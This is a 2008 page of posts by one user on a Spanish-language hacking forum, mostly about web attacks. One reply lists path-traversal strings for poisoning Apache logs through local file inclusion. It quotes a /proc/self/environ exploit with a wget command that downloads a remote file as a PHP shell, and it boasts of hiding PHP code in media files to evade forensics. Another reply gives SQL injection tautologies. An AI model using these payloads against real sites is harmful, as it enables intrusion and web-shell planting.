elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29 30
211  Seguridad Informática / Nivel Web / Re: Web vulnerabilities to gain access to the system en: 15 Octubre 2008, 00:30 am
Kool, me gusto mas la version en Español, suena y se lee mas original que la version en Ingles XD

-berz3k.
212  Seguridad Informática / Nivel Web / Re: ayuda con sql iyeccion en: 13 Octubre 2008, 18:54 pm
Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.

-berz3k.
213  Seguridad Informática / Nivel Web / Re: Web vulnerabilities to gain access to the system en: 13 Octubre 2008, 18:48 pm
Lei el paper pepeluxx, siento que algunas cosas se puede automatizar mas mediante algun tipo de fuzzer sin usar tanto "perl" para vulnerabilidades ya conocidas y tan "trilladas" como LFI, RFI , Blind, me gusta usar las tools de mandingo las conoceis ? ademas de uno que otro fuzzer que realmente vale la pena, tambien es posible mejorar algunos vectores que igual valdria la pena agregar a tu paper y/o mencionar.

Código:
-----[ 2.2.1 - Injecting PHP code into apache logs

Seguramente te falto mencionar estos Vectores aunque no he ordenado algunos mas, donde tambien son interesantes.

Código:

"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);


Código:
----[ 2.2.2 - Injecting PHP code into process table

Vaya interesante no le conocia, las referencias que agregas respecto a esta tecnica, se menciona algo como esto:

Código:
url = 'http://www.g-brain.net/index.php?page=../../../proc/self/environ'
cmd = 'wget http://www.g-brain.net/fish.txt -O fish.php;rm wget-log'

Antes de realizarlo se tedria que conocer el verdaro PATH de donde es encuentra el proc, estoy en slackware y sunOs x86 cambia bastante, una lista de ello haria falta, que tambien no esta referenciado, pepeluxx tu paper me da la impresion de que basado en su gran mayoria en el mismo que haces referencia

http://www.g-brain.net/tutorials/local-file-inclusions.txt

Código:
-----[ 2.2.3 - Injecting PHP code into an image

Mmm pepeluxx te haz leido el paper de codebreak de w4cking.com mmm me parece existe un video tambien, pero la moda es hacerlo funcionar ya no solo en .jpg , gif etc, es interesante usarlo en . swf y hasta en video .flv. mpeg :-) , bueno la idea me la dio sirdarckcat y quedo de lujo, los forenses no encuentran nada XDD

Hey pepeluxx te ha quedado de lujo, esperamos la version en Spanish que seria un poco mas entendible y original para la Spanish Race.... mantenos informado de la version sobre este mismo hilo.

-berz3k.


214  Seguridad Informática / Nivel Web / Re: Ayuda en inyeccion SQL --TABLA!!! en: 9 Octubre 2008, 03:54 am
Seguramente la web no sera vulnerable , no te envia mensaje de error en "sintaxis" y si tampoco te acepta el True/False mmm sera dificil obtener data de la Base de Datos/Server y no precisamente para hacer un deface.

-berz3k.
215  Seguridad Informática / Nivel Web / Re: Scanner RFI simple en PHP en: 8 Octubre 2008, 17:51 pm
Pepeluxx , vaya lo he probado mmm bastante casero comparado con otros programas de "audit source code" , algunas fallas y warnings al ejecutar mmm pero lo puedo mejorar con un poco de tiempo, ya que me he programado un code , para auditar diferentes lenguajes Asp.net, VB, C# , etc sobre todo ahora que ando en una "auditoria de codigo" y tengo un monton de lineas que leer, mmm basicamente programe mis vectores sobre un .XML para hacerlo un poco mas ameno el trabajo, aunque aun me falta la parte para reportear en .html

-berz3k.
216  Seguridad Informática / Nivel Web / Re: Ayuda en inyeccion SQL --TABLA!!! en: 8 Octubre 2008, 17:42 pm
Mmm no siempre lograras escapar con los clasicos "metachars" y otra mas no siempre veras el msg de error para lograr el SQLi, mmmm se me ocurre Blind aunque tambien puedes usar los clasicas conversiones logicas (True False) para comprobar la injeccion

e.g

Código:
Or 1=1
Or ‘p’=’p’
etc
etc
217  Seguridad Informática / Nivel Web / Re: Scanner RFI simple en PHP en: 7 Octubre 2008, 02:40 am
Vale pepeluxx, lo pruebo y te comento.

-berz3k.
218  Seguridad Informática / Nivel Web / Re: Scanner RFI simple en PHP en: 6 Octubre 2008, 18:16 pm
@pepeluxx

No veo por ningun lado la tool/fuzzer que comentas pepelux, post link or source code

-berz3k.
219  Programación / Programación C/C++ / Re: super pack de 14o problemas de borland c++ desarrollados en: 5 Octubre 2008, 04:42 am
El link anteriormente posteado por fiisi sigue rulando, no se que problemas tengas Shadoweps.

-berz3k.

220  Programación / Java / Re: [Source] Space Invaders en: 2 Octubre 2008, 08:22 am
Hey esta "chido" el space invaders, si tengo tiempo le metere algo personalizado.

-berz3k.

Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29 30
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines